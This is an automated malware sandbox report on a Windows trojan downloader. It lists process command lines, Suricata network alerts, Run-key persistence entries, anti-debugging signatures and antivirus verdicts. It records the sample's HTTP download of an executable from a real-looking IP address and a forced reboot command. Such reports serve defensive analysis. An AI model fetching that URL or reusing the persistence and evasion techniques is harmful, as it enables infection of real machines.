Category | Machine | Started | Completed |
---|---|---|---|
FILE | s1_win7_x6402 | Sept. 15, 2021, 9:24 a.m. | Sept. 15, 2021, 9:37 a.m. |
-
-
-
cmd.exe "C:\Windows\system32\cmd.exe" /c "C:\Users\test22\AppData\Local\Temp\CE5.tmp\CF5.tmp\CF6.bat C:\Users\test22\wincfg.exe"
2452
-
-
-
shutdown.exe shutdown /r
1664
-
-
Suricata Alerts
Flow | SID | Signature | Category |
---|---|---|---|
TCP 185.215.113.84:80 -> 192.168.56.102:49163 | 2400024 | ET DROP Spamhaus DROP Listed Traffic Inbound group 25 | Misc Attack |
TCP 192.168.56.102:49163 -> 185.215.113.84:80 | 2016141 | ET INFO Executable Download from dotted-quad Host | A Network Trojan was detected |
TCP 192.168.56.102:49163 -> 185.215.113.84:80 | 2019714 | ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile | Potentially Bad Traffic |
TCP 185.215.113.84:80 -> 192.168.56.102:49163 | 2018959 | ET POLICY PE EXE or DLL Windows file download HTTP | Potential Corporate Privacy Violation |
TCP 185.215.113.84:80 -> 192.168.56.102:49163 | 2021076 | ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response | Potentially Bad Traffic |
Suricata TLS
No Suricata TLS
pdb_path |
packer | Armadillo v1.71 |
suspicious_features | Connection to IP address | suspicious_request | GET http://185.215.113.84/ec.exe |
request | GET http://185.215.113.84/ec.exe |
description | loadetc.exe tried to sleep 135 seconds, actually delayed analysis time by 4 seconds |
file | C:\Users\test22\wincfg.exe |
file | C:\Users\test22\AppData\Local\Temp\CE5.tmp\CF5.tmp\CF6.bat |
file | C:\Users\test22\AppData\Local\Temp\CE5.tmp\Defender.exe |
cmdline | "C:\Windows\system32\cmd.exe" /c "C:\Users\test22\AppData\Local\Temp\CE5.tmp\CF5.tmp\CF6.bat C:\Users\test22\wincfg.exe" |
cmdline | cmd.exe /c shutdown /r |
cmdline | "C:\Windows\System32\cmd.exe" /c shutdown /r |
description | (no description) | rule | DebuggerCheck__GlobalFlags | ||||||
description | (no description) | rule | DebuggerCheck__QueryInfo | ||||||
description | (no description) | rule | DebuggerHiding__Thread | ||||||
description | (no description) | rule | DebuggerHiding__Active | ||||||
description | (no description) | rule | DebuggerException__SetConsoleCtrl | ||||||
description | (no description) | rule | ThreadControl__Context | ||||||
description | (no description) | rule | SEH__vectored | ||||||
description | Checks if being debugged | rule | anti_dbg | ||||||
description | Bypass DEP | rule | disable_dep |
cmdline | "C:\Windows\system32\cmd.exe" /c "C:\Users\test22\AppData\Local\Temp\CE5.tmp\CF5.tmp\CF6.bat C:\Users\test22\wincfg.exe" |
cmdline | cmd.exe /c shutdown /r |
cmdline | shutdown /r |
cmdline | "C:\Windows\System32\cmd.exe" /c shutdown /r |
cmdline | C:\Windows\System32\cmd /c "C:\Users\test22\AppData\Local\Temp\CE5.tmp\CF5.tmp\CF6.bat C:\Users\test22\wincfg.exe" |
host | 172.67.188.154 | |||
host | 185.215.113.84 |
reg_key | HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\Windows Configuration | reg_value | C:\Users\test22\wincfg.exe | ||||||
reg_key | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Windows Configuration | reg_value | C:\Users\test22\wincfg.exe |
file | C:\Users\test22\wincfg.exe:Zone.Identifier |
Lionic | Trojan.Win32.Generic.a!c |
Elastic | malicious (high confidence) |
MicroWorld-eScan | Generic.Malware.S!dld!.CD6F7FD7 |
FireEye | Generic.mg.2bd18b0ce7aa8dfa |
McAfee | Artemis!2BD18B0CE7AA |
Cylance | Unsafe |
Sangfor | Trojan.Win32.Save.a |
CrowdStrike | win/malicious_confidence_90% (W) |
BitDefenderTheta | Gen:NN.ZexaF.34142.auW@aqugTtpi |
Symantec | ML.Attribute.HighConfidence |
ESET-NOD32 | Win32/TrojanDownloader.Tiny.NTK |
APEX | Malicious |
Paloalto | generic.ml |
Kaspersky | HEUR:Trojan-Downloader.Win32.Generic |
BitDefender | Generic.Malware.S!dld!.CD6F7FD7 |
Avast | Win32:MalwareX-gen [Trj] |
Tencent | Win32.Trojan-downloader.Generic.Huzp |
Ad-Aware | Generic.Malware.S!dld!.CD6F7FD7 |
Emsisoft | Generic.Malware.S!dld!.CD6F7FD7 (B) |
McAfee-GW-Edition | BehavesLike.Win32.Generic.zt |
Sophos | Mal/Generic-S |
eGambit | Unsafe.AI_Score_97% |
Avira | TR/Crypt.XPACK.Gen |
Kingsoft | Win32.Heur.KVMH017.a.(kcloud) |
Microsoft | Trojan:Win32/Sabsik.FL.B!ml |
GData | Generic.Malware.S!dld!.CD6F7FD7 |
Cynet | Malicious (score: 100) |
AhnLab-V3 | Malware/Win32.Generic.C4204685 |
Acronis | suspicious |
VBA32 | suspected of Trojan.Downloader.gen |
ALYac | Generic.Malware.S!dld!.CD6F7FD7 |
MAX | malware (ai score=87) |
Malwarebytes | Generic.Malware/Suspicious |
Rising | Trojan.Generic@ML.100 (RDMK:ymjbG3a0zhHo1Vz5kgmlLQ) |
SentinelOne | Static AI - Malicious PE |
MaxSecure | Trojan.Malware.300983.susgen |
AVG | Win32:MalwareX-gen [Trj] |
Cybereason | malicious.ce7aa8 |